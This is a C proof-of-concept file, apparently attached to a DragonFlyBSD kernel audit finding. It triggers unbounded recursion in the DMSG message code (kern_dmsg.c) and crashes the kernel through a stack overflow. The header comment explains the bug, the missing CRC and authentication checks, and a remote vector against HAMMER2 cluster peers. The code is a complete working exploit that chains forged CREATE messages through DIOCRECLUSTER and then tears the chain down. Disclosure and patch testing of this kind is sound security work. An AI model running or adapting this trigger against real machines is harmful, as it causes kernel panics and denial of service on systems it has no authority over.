⬢ DragonFlyBSD Kernel Audit
DF-0017 / trigger.c
← back to finding ↓ download raw
/*
 * DF-0017 PoC (self-contained trigger) — kdmsg unbounded recursion ->
 * kernel thread stack overflow (DoS).
 *
 * Bug: kdmsg_simulate_failure() (sys/kern/kern_dmsg.c:1321) recurses through
 *   state->subq with NO depth limit (recursive call at kern_dmsg.c:1346).
 *   kdmsg_state_dying() (kern_dmsg.c:1421) does the same (recursive call at
 *   :1428).  A DMSG peer builds an arbitrarily deep parent->child chain via
 *   CREATE messages whose `circuit` references the previous state's msgid
 *   (child linked at kern_dmsg.c:917).  Triggering teardown — a DELETE on the
 *   chain root (kdmsg_state_cleanuprx at kern_dmsg.c:1255 calls
 *   kdmsg_simulate_failure) or closing the connection (write-thread teardown
 *   at kern_dmsg.c:555) — recurses depth-first through the whole chain and
 *   overflows the 16 KB LWKT kernel thread stack
 *   (UPAGES*PAGE_SIZE = 4*4096, sys/sys/thread.h), panicking the kernel.
 *
 *   struct kdmsg_state (sys/sys/dmsg.h:735) has NO depth/nesting field โ€” the
 *   recursion is genuinely unbounded.  The receive path
 *   (kdmsg_iocom_thread_rd, kern_dmsg.c:326) does NOT verify hdr_crc/aux_crc,
 *   so forged messages are accepted.
 *
 * Setup solved: a DMSG iocom fd is attached to the kernel's disk-iocom parser
 *   by issuing DIOCRECLUSTER (sys/sys/diskslice.h) on a raw disk device node,
 *   passing one end of an AF_UNIX socketpair.  The kernel's reader thread then
 *   parses whatever we write to the other end as DMSG wire messages.  This
 *   requires permission to open the disk device (root / operator group); on
 *   this guest /dev/vbd0 is root:operator crw-r----- so unprivileged users
 *   cannot trigger the LOCAL vector.  (The REMOTE vector — a HAMMER2 cluster
 *   peer feeding these messages over the network — is unauthenticated because
 *   LNK_AUTH is unimplemented, making it a remote DoS for clustered deploys.)
 *
 * Build (DragonFly):  cc -o trigger trigger.c -lpthread
 *
 * Run (as root):  ./trigger [depth]            (default depth 300)
 *   depth = number of chained CREATE messages (>= ~100 overflows 16 KB stack)
 *
 * Expected (bug present): kernel panic — double-fault / "supervisor read,
 *   page not present" / explicit stack-guard trap — with a backtrace full of
 *   kdmsg_simulate_failure / kdmsg_state_dying / kdmsg_state_abort frames.
 *   On a fixed kernel (depth cap) the messages are processed normally and the
 *   process exits cleanly (no panic).
 *
 * WARNING: panics / corrupts the kernel stack on a vulnerable kernel.  Run
 * only on a disposable VM.
 */

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/diskslice.h>	/* DIOCRECLUSTER, struct disk_ioc_recluster */
#include <sys/dmsg.h>
#include <sys/socket.h>

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Path of the disk device node that main() opens O_RDWR and issues
 * DIOCRECLUSTER on.  Hard-coded for the test guest; edit to match the
 * machine under test.
 */
#define DMSG_DISK	"/dev/vbd0"

/*
 * Fill `buf` with a zeroed 64-byte DMSG header carrying the given command,
 * message id and circuit.  No aux payload follows the header.
 *
 * buf:     destination; the first 64 bytes are overwritten.
 * cmd:     value stored in the header's cmd field.
 * msgid:   value stored in the header's msgid field.
 * circuit: value stored in the header's circuit field.
 */
static void
mk_dmsg(void *buf, uint32_t cmd, uint64_t msgid, uint64_t circuit)
{
	dmsg_hdr_t *hdr = memset(buf, 0, 64);

	hdr->magic = DMSG_HDR_MAGIC;
	hdr->circuit = circuit;
	hdr->msgid = msgid;
	hdr->cmd = cmd;

	/*
	 * Header only: no aux data, and both CRC fields are left at zero
	 * because the receive path does not verify them.
	 */
	hdr->aux_bytes = 0;
	hdr->aux_crc = 0;
	hdr->hdr_crc = 0;
}

/*
 * Drain thread: read and discard whatever the kernel writes back (LNK_CONN,
 * NOSUPP replies, LNK_PING...) so the socket send buffer never fills and
 * deadlocks the kernel's writer thread.
 *
 * arg: pointer to an int holding the descriptor to read from; the value is
 *      copied once when the thread starts.
 *
 * Returns NULL once read() reports end-of-file or an error other than EINTR.
 */
static void *
drain(void *arg)
{
	int fd = *(int *)arg;
	char buf[4096];

	for (;;) {
		ssize_t n = read(fd, buf, sizeof(buf));

		if (n > 0)
			continue;
		/* An interrupted read is not a reason to stop draining. */
		if (n < 0 && errno == EINTR)
			continue;
		break;
	}
	return NULL;
}

/*
 * Entry point.  Attaches one end of an AF_UNIX socketpair to the DMSG iocom
 * of DMSG_DISK via DIOCRECLUSTER, writes `depth` chained CREATE headers
 * followed by a DELETE for the chain root, then closes our end of the
 * socketpair as a second teardown trigger.
 *
 * argv[1] (optional): chain depth as a decimal integer (default 300).
 *   Values below 1 are clamped to 1; non-numeric or out-of-range values are
 *   rejected.
 *
 * Returns 0 if the process is still running after both triggers.  Exits with
 * status 1 via err()/errx() on any setup failure.
 */
int
main(int argc, char **argv)
{
	/* Unbuffered stderr: every progress line is emitted immediately. */
	setvbuf(stderr, NULL, _IONBF, 0);
	int depth = 300;		/* >> ~100 needed to overflow 16 KB stack */
	if (argc >= 2) {
		char *end;

		errno = 0;
		long v = strtol(argv[1], &end, 10);
		if (end == argv[1] || *end != '\0')
			errx(1, "invalid depth '%s' (usage: %s [depth])",
			    argv[1], argv[0]);
		if (errno == ERANGE || v > INT_MAX)
			errx(1, "depth '%s' out of range", argv[1]);
		depth = (v < 1) ? 1 : (int)v;
	}

	/* --- 1. open the raw disk device (needs root/operator) --- */
	int diskfd = open(DMSG_DISK, O_RDWR);
	if (diskfd < 0)
		err(1, "open %s (need root/operator for DIOCRECLUSTER)", DMSG_DISK);
	fprintf(stderr, "[1] opened %s fd=%d\n", DMSG_DISK, diskfd);

	/* --- 2. socketpair: kernel reads end[0], we write end[1] --- */
	int sv[2];
	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
		err(1, "socketpair");
	fprintf(stderr, "[2] socketpair sv[%d,%d]\n", sv[0], sv[1]);

	/* drain kernel->us traffic so the kernel writer never blocks */
	pthread_t dt;
	fprintf(stderr, "[2a] creating drain thread\n");
	/* pthread_create reports failure via its return value, not errno. */
	int rc = pthread_create(&dt, NULL, drain, &sv[1]);
	if (rc != 0)
		errx(1, "pthread_create: %s", strerror(rc));
	fprintf(stderr, "[2b] drain thread started\n");

	/* --- 3. attach sv[0] to the disk's DMSG iocom --- */
	struct disk_ioc_recluster recl;
	memset(&recl, 0, sizeof(recl));
	recl.fd = sv[0];
	fprintf(stderr, "[2c] issuing DIOCRECLUSTER (recl.fd=%d)...\n", recl.fd);
	if (ioctl(diskfd, DIOCRECLUSTER, &recl) < 0)
		err(1, "DIOCRECLUSTER");
	fprintf(stderr, "[3] DIOCRECLUSTER ok\n");

	fprintf(stderr,
	    "[*] DMSG iocom attached; sending %d chained CREATEs + root DELETE\n",
	    depth);

	/* --- 4. build the deep chain: msgid=i is child of msgid=(i-1) --- */
	char buf[64];
	for (int i = 1; i <= depth; i++) {
		mk_dmsg(buf, DMSG_LNK_PAD | DMSGF_CREATE, (uint64_t)i,
		    (i == 1) ? 0ULL : (uint64_t)(i - 1));
		ssize_t w = write(sv[1], buf, sizeof(buf));
		if (w < 0)
			err(1, "write CREATE %d (rv=%zd)", i, w);
		/* Short write: errno is not meaningful, so don't print it. */
		if (w != (ssize_t)sizeof(buf))
			errx(1, "write CREATE %d (rv=%zd)", i, w);
	}
	fprintf(stderr, "[4] wrote %d CREATEs\n", depth);

	/* --- 5. DELETE the chain root -> cleanuprx -> kdmsg_simulate_failure
	 * -> unbounded recursion -> stack overflow. */
	mk_dmsg(buf, DMSG_LNK_PAD | DMSGF_DELETE, 1ULL, 0ULL);
	ssize_t w = write(sv[1], buf, sizeof(buf));
	/*
	 * A failed DELETE is reported but not fatal: the close() below is a
	 * second, independent trigger.
	 */
	if (w < 0)
		warn("write DELETE root");
	else if (w != (ssize_t)sizeof(buf))
		warnx("short write for DELETE root");
	fprintf(stderr, "[5] wrote DELETE root (rv=%zd); waiting for panic...\n", w);

	/* give the kernel reader thread time to process the DELETE */
	sleep(3);
	fprintf(stderr, "[6] survived sleep(3); closing sv[1] to trigger EOF path\n");

	/* fallback trigger: closing sv[1] -> reader EOF -> write-thread teardown
	 * (kern_dmsg.c:555) kdmsg_simulate_failure(&state0) -> same recursion. */
	close(sv[1]);
	sleep(3);
	fprintf(stderr, "[7] survived; no panic observed\n");
	return 0;
}